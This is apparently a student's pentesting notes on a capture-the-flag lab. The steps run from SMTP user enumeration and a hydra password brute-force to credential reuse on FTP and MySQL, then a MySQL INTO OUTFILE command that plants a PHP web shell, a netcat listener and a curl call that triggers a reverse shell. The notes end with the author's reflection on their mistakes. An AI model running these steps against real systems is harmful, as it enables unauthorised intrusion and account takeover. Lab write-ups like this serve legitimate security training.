Monty's Pentesting Notes | Obsidian

    Acs Easy Lab

    Nmap:

    nmap -sCV 10.129.62.133
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-10 14:14 EST
Nmap scan report for 10.129.62.133
Host is up (0.074s latency).
Not shown: 993 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp
| fingerprint-strings: 
|   GenericLines: 
|     220 Core FTP Server Version 2.0, build 725, 64-bit Unregistered
|     Command unknown, not supported or not allowed...
|     Command unknown, not supported or not allowed...
|   NULL, SMBProgNeg: 
|_    220 Core FTP Server Version 2.0, build 725, 64-bit Unregistered
25/tcp   open  smtp          hMailServer smtpd
| smtp-commands: WIN-EASY, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp   open  http          Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/7.4.29)
| http-title: Welcome to XAMPP
|_Requested resource was http://10.129.62.133/dashboard/
443/tcp  open  ssl/https     Core FTP HTTPS Server
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 401 Unauthorized
|     Server: Core FTP HTTPS Server
|_http-server-header: Core FTP HTTPS Server
587/tcp  open  smtp          hMailServer smtpd
3306/tcp open  mysql         MySQL 5.5.5-10.4.24-MariaDB
3389/tcp open  ms-wbt-server Microsoft Terminal Services
Nmap done: 1 IP address (1 host up) scanned in 43.25 seconds

    Nmap scan shows taht services open are Core FTP version 2.0, SMTP, Apache HTTP Server, and an HTTPS server that is running the FTP, and lastly a 3389 Terminal Services.

    1. User enumeration

    Enumerate the SMTP #SMTP server to find a valid user

    smtp-user-enum -M RCPT -U users.list -D inlanefreight.htb -t 10.129.132.11

    I found a valid credential returned: fiona@inlanefreight.htb

    1. Brute-forcing fiona's password against the SMTP server
      #brute_forcing_SMTP
    hydra -l fiona@inlanefreight.htb -P /usr/share/wordlists/rockyou.txt -f 10.129.62.133 smtp

    found credential

    fiona@inlanefreight.htb:987654321
    1. Try to use the credential on various services

    Core FTP:
    obtained 2 files
    #credential_stuffing

    └─$ cat WebServersInfo.txt
CoreFTP:
Directory C:\CoreFTP
Ports: 21 & 443
Test Command: curl -k -H "Host: localhost" --basic -u <username>:<password> https://localhost/docs.txt

Apache
Directory "C:\xampp\htdocs\"
Ports: 80 & 4443
Test Command: curl http://localhost/test.php

    and

    └─$ cat docs.txt          
I'm testing the FTP using HTTPS, everything looks good.

    I could also use fiona's credentials to access the Core FTP server through HTTPS, but that's the same as using ftp command

    MySQL:
    #mysql

    mysql -u fiona -p987654321 -h 10.129.62.133
ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it

    use the --skip-ssl flag to get around this

    mysql -u fiona -p987654321 -h 10.129.57.244 --skip-ssl
    1. Writing Files onto the Web Server

    from WebServerInfo.txt, we can see that the directory of the web server is C:\xampp\htdocs\, with this information, we can leverage the writing local files function in mysql to write a reverse shell into the web server directory.
    #file_upload #reverse_shell

    SELECT "<?php echo shell_exec('this is where the revshell command goes');?>" INTO OUTFILE 'C:/xampp/htdocs/shell.php';

    I obtained the reverse shell from revshells.com by choosing PowerShell #3 (Base64).
    #windows #powershell
    5. invoke the reverse shell

    start listening server

    nc -lvnp 4444

    invoke the web server to execute the shell #web_app_hacking

    curl http://10.129.57.244/shell.php

    by here I got a PowerShell Reverse Shell on my listening server.

    I struggled a lot with this lab, quite frankly. I only successfully captured the flag by looking at solutions online. My biggest mistake was not understanding the services running on the target system. HTTPS at port 443 is running the Core FTP server, but it is NOT a web server, so I uploaded a shell onto the FTP server, and hoped that clicking on it would invoke the server to execute the file; I was wrong, it's not a web server, it's just FTP.

    In order to execute a shell, I need to upload the shell to the correct directory of the web server on the system, which is given in WebServerInfo.txt, which I neglected. Moreover, I struggled quite a bit to bypass the TLS/SSL thing. I found the flag --skip-ssl to do the trick.